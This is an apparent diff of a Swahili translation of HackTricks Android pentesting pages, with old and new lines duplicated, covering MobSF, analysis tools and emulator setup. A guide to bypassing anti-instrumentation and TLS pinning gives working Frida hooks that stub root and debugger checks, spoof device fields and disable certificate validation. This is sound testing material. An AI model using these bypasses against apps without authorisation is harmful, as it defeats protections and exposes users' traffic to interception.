Ili **start** mtihani wa dynamic bonyeza kitufe cha kijani: "**Start Instrumentation**". Bonyeza "**Frida Live Logs**" kuona logs zinazozalishwa na Frida scripts na "**Live API Monitor**" kuona miito yote kwa methods zilizopigwa hook, arguments zilizopita na values zilizorejeshwa (hii itaonekana baada ya kubonyeza "Start Instrumentation").\
MobSF pia inakuwezesha kupakia **Frida scripts** zako mwenyewe (kutuma matokeo ya Frida scripts zako kwa MobSF tumia function `send()`). Pia ina **several pre-written scripts** unaweza kupakia (unaweza kuongeza zaidi katika `MobSF/DynamicAnalyzer/tools/frida_scripts/others/`), chagua tu, bonyeza "**Load**" na kisha "**Start Instrumentation**" (utaweza kuona logs za scripts hizo ndani ya "**Frida Live Logs**").
Ili **kuanza** dynamic testing bonyeza button ya kijani: "**Start Instrumentation**". Bonyeza "**Frida Live Logs**" kuona logs zinazozalishwa na Frida scripts na "**Live API Monitor**" kuona invoke zote za hooked methods, arguments zilizotumika na returned values (hii itaonekana baada ya kubofya "Start Instrumentation").\
MobSF pia inakuwezesha kupakia Frida scripts zako mwenyewe (kutuma matokeo ya Frida scripts zako kwa MobSF tumia function `send()`). Pia ina **several pre-written scripts** ambazo unaweza kupakia (unaweza kuongeza zaidi katika `MobSF/DynamicAnalyzer/tools/frida_scripts/others/`), chagua tu, bonyeza "**Load**" na kisha "**Start Instrumentation**" (utaweza kuona logs za script hizo ndani ya "**Frida Live Logs**").
![](<../../images/image (419).png>)
Zaidi ya hayo, una baadhi ya functionalities za ziada za Frida:
Zaidi ya hayo, una baadhi ya Auxiliary Frida functionalities:
- **Enumerate Loaded Classes**: Itachapisha classes zote zilizopakiwa
- **Capture Strings**: Itachapisha strings zote zinazokamatwa wakati wa kutumia application (ina “noise” nyingi)
- **Capture String Comparisons**: Inaweza kuwa muhimu sana. Ita **show the 2 strings being compared** na kama matokeo yalikuwa True au False.
- **Enumerate Class Methods**: Weka jina la class (kama "java.io.File") na itachapisha methods zote za class.
- **Capture Strings**: Itachapisha strings zote zinazopigwa capture wakati wa kutumia application (inatoa noise nyingi)
- **Capture String Comparisons**: Inaweza kuwa muhimu sana. Itaonyesha **strings mbili zinazolinganishwa** na kama result ilikuwa True au False.
- **Enumerate Class Methods**: Weka jina la class (kama "java.io.File") na itachapisha methods zote za class hiyo.
- **Search Class Pattern**: Tafuta classes kwa pattern
- **Trace Class Methods**: **Trace** class nzima (ona inputs na outputs za methods zote za class). Kumbuka kwamba kwa default MobSF inatTrace several interesting Android Api methods.
- **Trace Class Methods**: **Trace** class nzima (ona inputs na outputs za methods zote za class). Kumbuka kwamba kwa default MobSF inafuatilia baadhi ya Android Api methods zinazovutia.
Mara baada ya kuchagua module ya ziada unayotaka kutumia unahitaji kubonyeza "**Start Intrumentation**" na utaona matokeo yote katika "**Frida Live Logs**".
Mara baada ya kuchagua module ya auxiliary unayotaka kutumia lazima ubofye "**Start Intrumentation**" na utaona outputs zote ndani ya "**Frida Live Logs**".
**Shell**
MobSF pia inakuja na shell yenye baadhi ya amri za **adb**, **MobSF commands**, na amri za kawaida za **shell** chini ya ukurasa wa dynamic analysis. Baadhi ya amri zinazovutia:
MobSF pia inakuleta shell yenye baadhi ya amri za **adb**, amri za **MobSF**, na amri za kawaida za **shell** chini ya ukurasa wa dynamic analysis. Baadhi ya amri zinazovutia:
```bash
help
shell ls
@ -654,34 +659,34 @@ exported_activities
services
receivers
```
**Zana za HTTP**
**Vifaa vya HTTP**
When http traffic is capture you can see an ugly view of the captured traffic on "**HTTP(S) Traffic**" bottom or a nicer view in "**Start HTTPTools**" green bottom. From the second option, you can **send** the **captured requests** to **proxies** like Burp or Owasp ZAP.\
To do so, _power on Burp -->_ _turn off Intercept --> in MobSB HTTPTools select the request_ --> press "**Send to Fuzzer**" --> _select the proxy address_ ([http://127.0.0.1:8080\\](http://127.0.0.1:8080)).
Wakati trafiki ya HTTP inapokamatwa unaweza kuona muonekano mbaya wa trafiki iliyokamatwa kwenye kitufe cha chini "**HTTP(S) Traffic**" au muonekano mzuri kwenye kitufe cha kijani "**Start HTTPTools**". Kutoka chaguo la pili, unaweza **kutuma** **maombi yaliyokamatwa** kwa **proxies** kama Burp au Owasp ZAP.\
Ili kufanya hivyo, _power on Burp -->_ _turn off Intercept --> in MobSB HTTPTools select the request_ --> press "**Send to Fuzzer**" --> _select the proxy address_ ([http://127.0.0.1:8080\\](http://127.0.0.1:8080)).
Once you finish the dynamic analysis with MobSF you can press on "**Start Web API Fuzzer**" to **fuzz http requests** an look for vulnerabilities.
Baada ya kumaliza dynamic analysis na MobSF unaweza kubofya "**Start Web API Fuzzer**" ili **fuzz http requests** na kutafuta udhaifu.
> [!TIP]
> After performing a dynamic analysis with MobSF the proxy settings me be misconfigured and you won't be able to fix them from the GUI. You can fix the proxy settings by doing:
> Baada ya kufanya dynamic analysis na MobSF mipangilio ya proxy inaweza kuwa imechafuka na hautaweza kuirekebisha kupitia GUI. Unaweza kurekebisha mipangilio ya proxy kwa kufanya:
>
> ```
> adb shell settings put global http_proxy :0
> ```
### Assisted Dynamic Analysis with Inspeckage
### Uchambuzi wa Dynamic Ulio kusaidiwa na Inspeckage
You can get the tool from [**Inspeckage**](https://github.com/ac-pm/Inspeckage).\
This tool with use some **Hooks** to let you know **what is happening in the application** while you perform a **dynamic analysis**.
Unaweza kupata zana kutoka [**Inspeckage**](https://github.com/ac-pm/Inspeckage).\
Zana hii itatumia baadhi ya **Hooks** kukujulisha **kinachoendelea katika application** huku ukifanya **dynamic analysis**.
### [Yaazhini](https://www.vegabird.com/yaazhini/)
Hii ni zana nzuri ya kufanya **static analysis kwa GUI**
Hii ni **zana nzuri za kufanya static analysis kwa GUI**
![](<../../images/image (741).png>)
### [Qark](https://github.com/linkedin/qark)
Zana hii imeundwa kutafuta kadhaa za **security related Android application vulnerabilities**, ama katika **source code** au **packaged APKs**. Zana pia ina uwezo wa kuunda **"Proof-of-Concept" deployable APK** na **ADB commands**, ili ku-exploit baadhi ya vulnerabilities zilizopatikana (Exposed activities, intents, tapjacking...). Kama ilivyo kwa Drozer, hakuna haja ya root test device.
Zana hii imeundwa kutafuta udhaifu mbalimbali zinazohusiana na **security** za Android application, iwe katika **source code** au **packaged APKs**. Zana pia ina uwezo wa kuunda "Proof-of-Concept" deployable APK na **ADB commands**, ili ku-exploit baadhi ya udhaifu uliopatikana (Exposed activities, intents, tapjacking...). Kama ilivyo kwa Drozer, hakuna haja ya ku-root kifaa cha mtihani.
```bash
pip3 install --user qark # --user is only needed if not using a virtualenv
qark --apk path/to/my.apk
@ -691,21 +696,21 @@ qark --java path/to/specific/java/file.java
### [**ReverseAPK**](https://github.com/1N3/ReverseAPK.git)
- Inaonyesha faili zote zilizotolewa kwa rejea rahisi
- Inafanya decompile faili za APK kwenda muundo wa Java na Smali kwa otomatiki
- Inachambua AndroidManifest.xml kwa udhaifu wa kawaida na tabia
- Uchambuzi wa msimbo wa chanzo (static) kwa udhaifu wa kawaida na tabia
- Hufanya decompile kwa faili za APK kwa njia ya otomatiki hadi muundo wa Java na Smali
- Huchambua AndroidManifest.xml kwa ajili ya udhaifu na tabia za kawaida
- Uchambuzi wa msimbo wa chanzo wa static kwa ajili ya udhaifu na tabia za kawaida
- Taarifa za kifaa
- na zaidi
- na mengi zaidi
```bash
reverse-apk relative/path/to/APP.apk
```
### [SUPER Android Analyzer](https://github.com/SUPERAndroidAnalyzer/super)
SUPER ni command-line application inayoweza kutumika kwenye Windows, MacOS X na Linux, inayochambua faili za _.apk_ ili kutafuta vulnerabilities. Hii inafanywa kwa kuzipanua APKs na kutekeleza mfululizo wa sheria ili kugundua vulnerabilities hizo.
SUPER ni programu ya mstari wa amri inayoweza kutumika kwenye Windows, MacOS X na Linux, ambayo inachambua faili za _.apk_ kutafuta vulnerabilities. Inafanya hivyo kwa kuzipakua APKs na kutumia mfululizo wa kanuni kugundua vulnerabilities hizo.
Sheria zote zimetengwa katika faili ya `rules.json`, na kila kampuni au mtapimaji anaweza kuunda sheria zake kuchambua wanazohitaji.
Kanuni zote ziko katika faili la `rules.json`, na kila kampuni au mjaribu anaweza kuunda kanuni zao ili kuchambua wanazohitaji.
Pakua latest binaries kutoka kwenye [download page](https://superanalyzer.rocks/download.html)
Pakua binaries za hivi karibuni kutoka kwenye [download page](https://superanalyzer.rocks/download.html)
```
super-analyzer {apk_file}
```
@ -715,15 +720,15 @@ super-analyzer {apk_file}
StaCoAn ni zana ya **crossplatform** inayowasaidia developers, bugbounty hunters na ethical hackers kufanya [static code analysis](https://en.wikipedia.org/wiki/Static_program_analysis) kwenye mobile applications.
Dhana ni kwamba unavuta na kuacha faili ya mobile application yako (.apk au .ipa) kwenye application ya StaCoAn na itaunda ripoti ya kuona na inayobebeka kwako. Unaweza kubinafsisha settings na wordlists ili kupata uzoefu uliobinafsishwa.
Mfumo ni kwamba una-vuta na kuacha faili ya programu yako ya simu (faili ya .apk au .ipa) kwenye programu ya StaCoAn na itaunda ripoti ya kuona na rahisi kubeba kwako. Unaweza kubadilisha mipangilio na wordlists ili kupata uzoefu uliobinafsishwa.
Pakua[ latest release](https://github.com/vincentcox/StaCoAn/releases):
Download[ latest release](https://github.com/vincentcox/StaCoAn/releases):
```
./stacoan
```
### [AndroBugs](https://github.com/AndroBugs/AndroBugs_Framework)
AndroBugs Framework ni mfumo wa uchambuzi wa udhaifu wa Android unaosaidia waendelezaji au hackers kupata udhaifu wa usalama unaowezekana katika programu za Android.\
AndroBugs Framework ni mfumo wa uchambuzi wa udhaifu wa Android unaosaidia waendelezaji au hackers kugundua udhaifu za usalama zinazoweza kuwepo katika programu za Android.\
[Windows releases](https://github.com/AndroBugs/AndroBugs_Framework/releases)
```
python androbugs.py -f [APK file]
@ -731,11 +736,11 @@ androbugs.exe -f [APK file]
```
### [Androwarn](https://github.com/maaaaz/androwarn)
**Androwarn** ni zana ambayo lengo lake kuu ni kugundua na kuwaonya mtumiaji kuhusu tabia zinazoweza kuwa za hatari zinazotengenezwa na programu ya Android.
**Androwarn** ni zana ambalo lengo lake kuu ni kugundua na kuwaonya mtumiaji kuhusu tabia hatari zinazoweza kutengenezwa na programu ya Android.
Ugunduzi hufanywa kwa kutumia **static analysis** ya Dalvik bytecode ya programu, inayowakilishwa kama **Smali**, kwa kutumia maktaba ya [`androguard`](https://github.com/androguard/androguard).
Ugundaji hufanywa kwa kupitia **static analysis** ya bytecode ya programu ya Dalvik, inayowakilishwa kama **Smali**, kwa kutumia maktaba ya [`androguard`](https://github.com/androguard/androguard).
Zana hii inatafuta **common behavior of "bad" applications** kama: Telephony identifiers exfiltration, Audio/video flow interception, PIM data modification, Arbitrary code execution...
Zana hii inaangalia **tabia za kawaida za programu "mbaya"** kama: Telephony identifiers exfiltration, Audio/video flow interception, PIM data modification, Arbitrary code execution...
```
python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3
```
@ -743,9 +748,9 @@ python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3
![](<../../images/image (595).png>)
**MARA** ni Mobile Application Reverse engineering and Analysis Framework. Ni chombo kinachokusanya zana zinazotumika mara kwa mara za mobile application reverse engineering na analysis, kusaidia katika testing mobile applications dhidi ya OWASP mobile security threats. Lengo lake ni kufanya kazi hii iwe rahisi na rafiki kwa mobile application developers na security professionals.
**MARA** is a **M**obile **A**pplication **R**everse engineering and **A**nalysis Framework. Ni zana inayoweka pamoja zana zinazotumika mara kwa mara za mobile application reverse engineering na analysis, kusaidia katika kujaribu mobile applications dhidi ya OWASP mobile security threats. Lengo lake ni kufanya kazi hii iwe rahisi na rafiki kwa mobile application developers na security professionals.
Inaweza:
It is able to:
- Extract Java and Smali code using different tools
- Analyze APKs using: [smalisca](https://github.com/dorneanu/smalisca), [ClassyShark](https://github.com/google/android-classyshark), [androbugs](https://github.com/AndroBugs/AndroBugs_Framework), [androwarn](https://github.com/maaaaz/androwarn), [APKiD](https://github.com/rednaga/APKiD)
@ -756,11 +761,11 @@ Inaweza:
### Koodous
Useful to detect malware: [https://koodous.com/](https://koodous.com)
Inayofaa kutambua malware: [https://koodous.com/](https://koodous.com/)
## Obfuscating/Deobfuscating code
Kumbuka kwamba, kutegemea huduma na usanidi unaotumia kuobfuscate code, Secrets huenda zikabaki obfuscated au la.
Kumbuka kwamba, kulingana na service na configuration unayotumia kuobfuscate the code, secrets zinaweza au zisiwe obfuscated.
### [ProGuard](<https://en.wikipedia.org/wiki/ProGuard_(software)>)
@ -772,7 +777,7 @@ ProGuard is distributed as part of the Android SDK and runs when building the ap
Find a step-by-step guide to deobfuscate the apk in [https://blog.lexfo.fr/dexguard.html](https://blog.lexfo.fr/dexguard.html)
(Kutoka katika mwongozo huo) Mara ya mwisho tulipoangalia, Dexguard mode of operation ilikuwa:
(From that guide) Last time we checked, the Dexguard mode of operation was:
- load a resource as an InputStream;
- feed the result to a class inheriting from FilterInputStream to decrypt it;
@ -784,11 +789,11 @@ Find a step-by-step guide to deobfuscate the apk in [https://blog.lexfo.fr/dexgu
**DeGuard reverses the process of obfuscation performed by Android obfuscation tools. This enables numerous security analyses, including code inspection and predicting libraries.**
You can upload an obfuscated APK to their platform.
Unaweza upload an obfuscated APK kwenye platform yao.
### [Deobfuscate android App]https://github.com/In3tinct/deobfuscate-android-app
This is a LLM tool to find any potential security vulnerabilities in android apps and deobfuscate android app code. Uses Google's Gemini public API.
Hii ni zana ya LLM kutafuta potential security vulnerabilities katika android apps na deobfuscate android app code. Inatumia Google's Gemini public API.
### [Simplify](https://github.com/CalebFenton/simplify)
@ -806,7 +811,7 @@ APKiD gives you information about **how an APK was made**. It identifies many **
### [Androl4b](https://github.com/sh4hin/Androl4b)
AndroL4b ni Android security virtual machine based on ubuntu-mate, inajumuisha mkusanyiko wa latest framework, tutorials na labs kutoka kwa different security geeks na researchers kwa reverse engineering na malware analysis.
AndroL4b ni Android security virtual machine inayotegemea ubuntu-mate inayojumuisha mkusanyiko wa latest framework, tutorials na labs kutoka kwa security geeks na researchers kwa ajili ya reverse engineering na malware analysis.
## References

90
src/mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.md
View File

@ -2,14 +2,14 @@
{{#include ../../banners/hacktricks-training.md}}
Ukurasa huu unatoa mtiririko wa vitendo ili kupata tena dynamic analysis dhidi ya apps za Android zinazotambua au kuzuia instrumentation kwa sababu ya root, au kushikilia TLS pinning. Unalenga triage ya haraka, utambuzi wa kawaida, na copypasteable hooks/tactics za kuzipitisha bila ku-repack inapowezekana.
Ukurasa huu unaorodhesha mtiririko wa vitendo ili kurejesha dynamic analysis dhidi ya programu za Android zinazogundua/kuzuia instrumentation kwa root au kutekeleza TLS pinning. Unalenga triage ya haraka, ugunduzi wa kawaida, na hooks/tactics za nakili-na-wekewa (copypasteable) ili kuzipita bila kujaribu repacking inapowezekana.
## Detection Surface (ambacho apps zinakagua)
## Detection Surface (what apps check)
- Ukaguzi wa root: su binary, Magisk paths, getprop values, common root packages
- Uhakiki wa Frida/debugger (Java): Debug.isDebuggerConnected(), ActivityManager.getRunningAppProcesses(), getRunningServices(), scanning /proc, classpath, loaded libs
- Antidebug ya native: ptrace(), syscalls, antiattach, breakpoints, inline hooks
- Ukaguzi wa init mapema: Application.onCreate() or process start hooks ambazo hu-crash ikiwa instrumentation ipo
- Root checks: su binary, Magisk paths, getprop values, common root packages
- Frida/debugger checks (Java): Debug.isDebuggerConnected(), ActivityManager.getRunningAppProcesses(), getRunningServices(), scanning /proc, classpath, loaded libs
- Native antidebug: ptrace(), syscalls, antiattach, breakpoints, inline hooks
- Early init checks: Application.onCreate() or process start hooks that crash if instrumentation is present
- TLS pinning: custom TrustManager/HostnameVerifier, OkHttp CertificatePinner, Conscrypt pinning, native pins
## Step 1 — Quick win: hide root with Magisk DenyList
@ -18,14 +18,14 @@ Ukurasa huu unatoa mtiririko wa vitendo ili kupata tena dynamic analysis dhidi y
- Enable DenyList, add the target package
- Reboot and retest
Apps nyingi hutafuta tu viashiria vinavyoonekana (su/Magisk paths/getprop). DenyList mara nyingi hu-neutralize ukaguzi wa kijana.
Programu nyingi huangalia tu viashiria vinavyoonekana (su/Magisk paths/getprop). DenyList mara nyingi huondoa ukaguzi wa aina hiyo.
References:
- Magisk (Zygisk & DenyList): https://github.com/topjohnwu/Magisk
## Step 2 — 30second Frida Codeshare tests
Jaribu scripts za dropin za kawaida kabla ya kuchimba kwa undani:
Jaribu scripts za kawaida za dropin kabla ya kuchimba kwa undani:
- anti-root-bypass.js
- anti-frida-detection.js
@ -35,13 +35,13 @@ Example:
```bash
frida -U -f com.example.app -l anti-frida-detection.js
```
Hizi kwa kawaida huwa stub Java root/debug checks, process/service scans, na native ptrace(). Zinatumika kwenye apps zenye ulinzi mdogo; malengo yaliyoimarishwa yanaweza kuhitaji hooks maalum.
Hizi kwa kawaida stub Java root/debug checks, process/service scans, na native ptrace(). Zinasaidia kwenye apps zilizo na ulinzi mdogo; hardened targets zinaweza kuhitaji tailored hooks.
- Codeshare: https://codeshare.frida.re/
## Otomatisha na Medusa (Frida framework)
## Otomatisha kwa Medusa (Frida framework)
Medusa inatoa moduli 90+ tayari kwa ajili ya SSL unpinning, root/emulator detection bypass, HTTP comms logging, crypto key interception, na zaidi.
Medusa inatoa 90+ modules zilizo tayari kwa ajili ya SSL unpinning, root/emulator detection bypass, HTTP comms logging, crypto key interception, na mengine mengi.
```bash
git clone https://github.com/Ch0pin/medusa
cd medusa
@ -54,22 +54,22 @@ use http_communications/multiple_unpinner
use root_detection/universal_root_detection_bypass
run com.target.app
```
Vidokezo: Medusa ni nzuri kwa kupata faida za haraka kabla ya kuandika custom hooks. Unaweza pia cherry-pick modules na kuzichanganya na scripts zako.
Vidokezo: Medusa ni nzuri kwa kupata ushindi wa haraka kabla ya kuandika hooks maalum. Unaweza pia kuchagua modules kwa makini na kuzichanganya na scripts zako.
## Hatua 3 — Bypass init-time detectors by attaching late
## Hatua ya 3 — Pita kando detekta za wakati wa kuanzisha kwa kuambatisha baadaye
Ugunduzi mwingi hufanyika tu wakati wa process spawn/onCreate(). Spawntime injection (-f) au gadgets hugunduliwa; kuambatisha baada UI inapopakia kunaweza kupita bila kugunduliwa.
Deteksheni nyingi hufanya kazi tu wakati wa process spawn/onCreate(). Spawntime injection (-f) au gadgets hukamatwa; kuambatisha baada ya UI kupakia kunaweza kupita bila kugunduliwa.
```bash
# Launch the app normally (launcher/adb), wait for UI, then attach
frida -U -n com.example.app
# Or with Objection to attach to running process
aobjection --gadget com.example.app explore # if using gadget
```
Ikiwa hili litafanya kazi, weka session kuwa thabiti na endelea na map and stub checks.
Ikiwa hili litafanya kazi, hakikisha kikao kinabaki thabiti na endelea na kazi za kuunda ramani na ukaguzi wa stub.
## Hatua 4 — Ramani mantiki ya utambuzi kupitia Jadx na string hunting
## Hatua 4 — Ramani mantiki ya utambuzi kupitia Jadx na utafutaji wa strings
Static triage keywords in Jadx:
Maneno muhimu ya static triage katika Jadx:
- "frida", "gum", "root", "magisk", "ptrace", "su", "getprop", "debugger"
Mifano ya kawaida ya Java:
@ -78,16 +78,16 @@ public boolean isFridaDetected() {
return getRunningServices().contains("frida");
}
```
APIs za kawaida za kukagua/hook:
API za kawaida za kukagua/hook:
- android.os.Debug.isDebuggerConnected
- android.app.ActivityManager.getRunningAppProcesses / getRunningServices
- java.lang.System.loadLibrary / System.load (native bridge)
- java.lang.Runtime.exec / ProcessBuilder (probing commands)
- android.os.SystemProperties.get (root/emulator heuristics)
- java.lang.Runtime.exec / ProcessBuilder (maamri ya kuchunguza)
- android.os.SystemProperties.get (heuristics za root/emulator)
## Hatua 5 — Uundaji wa stub wakati wa runtime na Frida (Java)
## Hatua ya 5 — Runtime stubbing na Frida (Java)
Badilisha vidhibiti maalum ili kurudisha thamani salama bila repacking:
Override custom guards ili zirudishe thamani salama bila repacking:
```js
Java.perform(() => {
const Checks = Java.use('com.example.security.Checks');
@ -102,7 +102,7 @@ const AM = Java.use('android.app.ActivityManager');
AM.getRunningAppProcesses.implementation = function () { return java.util.Collections.emptyList(); };
});
```
Unapochambua crashes mapema? Dump classes tu kabla inavyokufa ili kugundua namespaces zinazoweza kuwa za utambuzi:
Triaging early crashes? Dump classes tu kabla inavyokufa ili kutambua detection namespaces zinazowezekana:
```js
Java.perform(() => {
Java.enumerateLoadedClasses({
@ -119,7 +119,7 @@ RootChecker.isDeviceRooted.implementation = function () { return false; };
} catch (e) {}
});
Log na fanya methods zinazoshukiwa zisifanye kazi ili kuthibitisha mtiririko wa utekelezaji:
Rekodi na kuzima mbinu zinazoshukiwa ili kuthibitisha mtiririko wa utekelezaji:
```js
Java.perform(() => {
const Det = Java.use('com.example.security.DetectionManager');
@ -131,7 +131,7 @@ return false;
```
## Bypass emulator/VM detection (Java stubs)
Kanuni za kawaida: Build.FINGERPRINT/MODEL/MANUFACTURER/HARDWARE zikiwa na generic/goldfish/ranchu/sdk; alama za QEMU kama /dev/qemu_pipe, /dev/socket/qemud; MAC ya default 02:00:00:00:00:00; 10.0.2.x NAT; ukosefu wa telephony/sensors.
Vidokezo vya kawaida: Build.FINGERPRINT/MODEL/MANUFACTURER/HARDWARE zikiwa zinajumuisha generic/goldfish/ranchu/sdk; QEMU artifacts kama /dev/qemu_pipe, /dev/socket/qemud; default MAC 02:00:00:00:00:00; 10.0.2.x NAT; kukosekana kwa telephony/sensors.
Spoof ya haraka ya Build fields:
```js
@ -143,11 +143,11 @@ Build.BRAND.value = 'google';
Build.FINGERPRINT.value = 'google/panther/panther:14/UP1A.231105.003/1234567:user/release-keys';
});
```
Ongeza stubs kwa ukaguzi wa kuwepo kwa faili na vitambulisho (TelephonyManager.getDeviceId/SubscriberId, WifiInfo.getMacAddress, SensorManager.getSensorList) ili kurudisha thamani za kweli.
Ongeza stubs kwa ukaguzi wa kuwepo kwa faili na vitambulisho (TelephonyManager.getDeviceId/SubscriberId, WifiInfo.getMacAddress, SensorManager.getSensorList) ili zirudishe thamani za kweli.
## SSL pinning bypass quick hook (Java)
Tawanya TrustManagers maalum na kulazimisha SSL contexts zinazoruhusu:
Batilisha TrustManagers maalum na kulazimisha SSL contexts zinazoruhusu:
```js
Java.perform(function(){
var X509TrustManager = Java.use('javax.net.ssl.X509TrustManager');
@ -166,16 +166,16 @@ return SSLContextInit.call(this, km, TrustManagers, sr);
});
```
Vidokezo
- Panua kwa OkHttp: hook okhttp3.CertificatePinner na HostnameVerifier kama inahitajika, au tumia script ya unpinning kutoka CodeShare.
- Panua kwa OkHttp: hook okhttp3.CertificatePinner na HostnameVerifier kama inavyohitajika, au tumia universal unpinning script kutoka CodeShare.
- Mfano wa kuendesha: `frida -U -f com.target.app -l ssl-bypass.js --no-pause`
## Hatua 6 — Fuata mnyororo wa JNI/native wakati Java hooks zinaposhindwa
## Hatua 6 — Fuata njia ya JNI/native wakati Java hooks zinashindwa
Fuata entry points za JNI ili kubaini native loaders na detection init:
Fuatilia JNI entry points ili kupata native loaders na detection init:
```bash
frida-trace -n com.example.app -i "JNI_OnLoad"
```
Tathmini ya haraka ya native ya faili za .so zilizojumuishwa:
Tathmini ya haraka ya native ya mafaili .so yaliyoambatanishwa:
```bash
# List exported symbols & JNI
nm -D libfoo.so | head
@ -186,7 +186,7 @@ Interactive/native reversing:
- Ghidra: https://ghidra-sre.org/
- r2frida: https://github.com/nowsecure/r2frida
Mfano: kuondoa ptrace ili kuishinda antidebug rahisi katika libc:
Mfano: kufanya ptrace isitumike ili kushinda antidebug rahisi katika libc:
```js
const ptrace = Module.findExportByName(null, 'ptrace');
if (ptrace) {
@ -202,28 +202,28 @@ reversing-native-libraries.md
## Hatua 7 — Objection patching (embed gadget / strip basics)
Ikiwa unapendelea repacking kuliko runtime hooks, jaribu:
Ikiwa unapendelea repacking badala ya runtime hooks, jaribu:
```bash
objection patchapk --source app.apk
```
Vidokezo:
- Inahitaji apktool; hakikisha toleo la sasa kutoka kwenye mwongozo rasmi ili kuepuka matatizo ya ujenzi: https://apktool.org/docs/install
- Gadget injection inaruhusu instrumentation bila root lakini bado inaweza kugunduliwa na stronger inittime checks.
- Requires apktool; ensure a current version from the official guide to avoid build issues: https://apktool.org/docs/install
- Gadget injection enables instrumentation without root but can still be caught by stronger inittime checks.
Hiari, ongeza LSPosed modules na Shamiko kwa stronger root hiding katika mazingira ya Zygisk, na andaa DenyList ili kufunika child processes.
Hiari, ongezea moduli za LSPosed na Shamiko kwa stronger root hiding katika Zygisk environments, na panga DenyList ili kufunika child processes.
Marejeleo:
Marejeo:
- Objection: https://github.com/sensepost/objection
## Hatua 8 — Njia mbadala: Rekebisha TLS pinning kwa muonekano wa mtandao
## Hatua 8 — Mbadala: Rekebisha TLS pinning kwa uwazi wa mtandao
Ikiwa instrumentation imezuiwa, bado unaweza kuchunguza trafiki kwa kuondoa pinning kwa njia ya static:
Ikiwa instrumentation imezuiwa, bado unaweza kuchunguza trafiki kwa kuondoa TLS pinning kwa njia ya statiki:
```bash
apk-mitm app.apk
# Then install the patched APK and proxy via Burp/mitmproxy
```
- Zana: https://github.com/shroudedcode/apk-mitm
- Kwa ujanja wa CAtrust katika usanidi wa mtandao (na user CA trust ya Android 7+), angalia:
- Kwa mbinu za CAtrust katika usanidi wa network (na user CA trust ya Android 7+), angalia:
{{#ref}}
make-apk-accept-ca-certificate.md
@ -233,7 +233,7 @@ make-apk-accept-ca-certificate.md
install-burp-certificate.md
{{#endref}}
## Mwongozo mfupi wa amri muhimu
## Orodha fupi ya amri muhimu
```bash
# List processes and attach
frida-ps -Uai
@ -253,10 +253,10 @@ apk-mitm app.apk
```
## Vidokezo na tahadhari
- Pendelea attaching baadaye badala ya spawning wakati apps zinapo-crash wakati wa launch
- Baadhi ya detections zinafanyika tena katika critical flows (e.g., payment, auth) — keep hooks active during navigation
- Changanya static na dynamic: string hunt katika Jadx ili kupunguza classes kwenye shortlist; kisha hook methods ili kuthibitisha wakati wa runtime
- Hardened apps zinaweza kutumia packers na native TLS pinning — tarajia ku-reverse native code
- Pendelea ku-attach mwishowe kuliko spawning wakati apps zinaporomoka wakati wa uzinduzi
- Baadhi ya utambuzi zinafanywa tena katika mizunguko muhimu (mf., payment, auth) — weka hooks zikiwa active wakati wa navigation
- Changanya static na dynamic: string hunt katika Jadx ili kupunguza orodha ya classes; kisha hook methods ili kuthibitisha wakati wa runtime
- Apps zilizo hardened zinaweza kutumia packers na native TLS pinning — tarajia ku-reverse native code
## References

104
src/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md
View File

@ -2,23 +2,23 @@
{{#include ../../banners/hacktricks-training.md}}
Asante sana kwa [**@offsecjay**](https://twitter.com/offsecjay) kwa msaada wake wakati wa kuunda yaliyomo haya.
Asante sana kwa [**@offsecjay**](https://twitter.com/offsecjay) kwa msaada wake wakati wa kuunda maudhui haya.
## Nini
Android Studio inaruhusu **kuendesha mashine pepe za Android ambazo unaweza kuzitumia kujaribu APKs**. Ili kuzitumia utahitaji:
Android Studio inaruhusu **kuendesha mashine pepe za Android ambazo unaweza kutumia kujaribu APKs**. Ili kuvitumia utahitaji:
- The **Android SDK tools** - [Download here](https://developer.android.com/studio/releases/sdk-tools).
- Au **Android Studio** (with Android SDK tools) - [Download here](https://developer.android.com/studio).
- Or **Android Studio** (with Android SDK tools) - [Download here](https://developer.android.com/studio).
Katika Windows (kwangu) **baada ya kusakinisha Android Studio** nilikuwa na **SDK Tools zimesakinishwa katika**: `C:\Users\<UserName>\AppData\Local\Android\Sdk\tools`
Katika Windows (kwangu) **baada ya kusakinisha Android Studio** nilipata **SDK Tools zimesakinishwa katika**: `C:\Users\<UserName>\AppData\Local\Android\Sdk\tools`
Kwenye mac unaweza **download the SDK tools** na kuwa nazo kwenye PATH kwa kukimbia:
Katika mac unaweza **kupakua SDK tools** na kuwa nazo kwenye PATH kwa kukimbia:
```bash
brew tap homebrew/cask
brew install --cask android-sdk
```
Au kutoka kwa **Android Studio GUI** kama ilivyoonyeshwa katika [https://stackoverflow.com/questions/46402772/failed-to-install-android-sdk-java-lang-noclassdeffounderror-javax-xml-bind-a](https://stackoverflow.com/questions/46402772/failed-to-install-android-sdk-java-lang-noclassdeffounderror-javax-xml-bind-a) ambayo itaweka hizo katika `~/Library/Android/sdk/cmdline-tools/latest/bin/` na `~/Library/Android/sdk/platform-tools/` na `~/Library/Android/sdk/emulator/`
Au kutoka kwa **Android Studio GUI** kama ilivyoonyeshwa katika [https://stackoverflow.com/questions/46402772/failed-to-install-android-sdk-java-lang-noclassdeffounderror-javax-xml-bind-a](https://stackoverflow.com/questions/46402772/failed-to-install-android-sdk-java-lang-noclassdeffounderror-javax-xml-bind-a) ambayo itawasakinisha katika `~/Library/Android/sdk/cmdline-tools/latest/bin/` na `~/Library/Android/sdk/platform-tools/` na `~/Library/Android/sdk/emulator/`
Kwa matatizo ya Java:
```java
@ -26,7 +26,7 @@ export JAVA_HOME=/Applications/Android\ Studio.app/Contents/jbr/Contents/Home
```
## GUI
### Andaa Virtual Machine
### Andaa Mashine ya Virtual
Ikiwa umeweka Android Studio, unaweza kufungua tu muonekano mkuu wa mradi na kufikia: _**Tools**_ --> _**AVD Manager.**_
@ -47,25 +47,25 @@ _**chagua** simu unayotaka kutumia_ na bonyeza _**Next.**_
>
> <img src="../../images/image (1144).png" alt="" data-size="original">
Katika muonekano wa sasa utaweza **kuchagua na kupakua Android image** ambayo simu itaendesha:
Katika muonekano wa sasa utaweza **kuchagua na kupakua image ya Android** ambayo simu itakayotumia itakimbia:
<figure><img src="../../images/image (1145).png" alt="" width="375"><figcaption></figcaption></figure>
Hivyo, chagua hiyo na kama haijapakuliwa bonyeza alama ya _**Download**_ kando ya jina (**sasa subiri hadi image inapakuliwa).**\
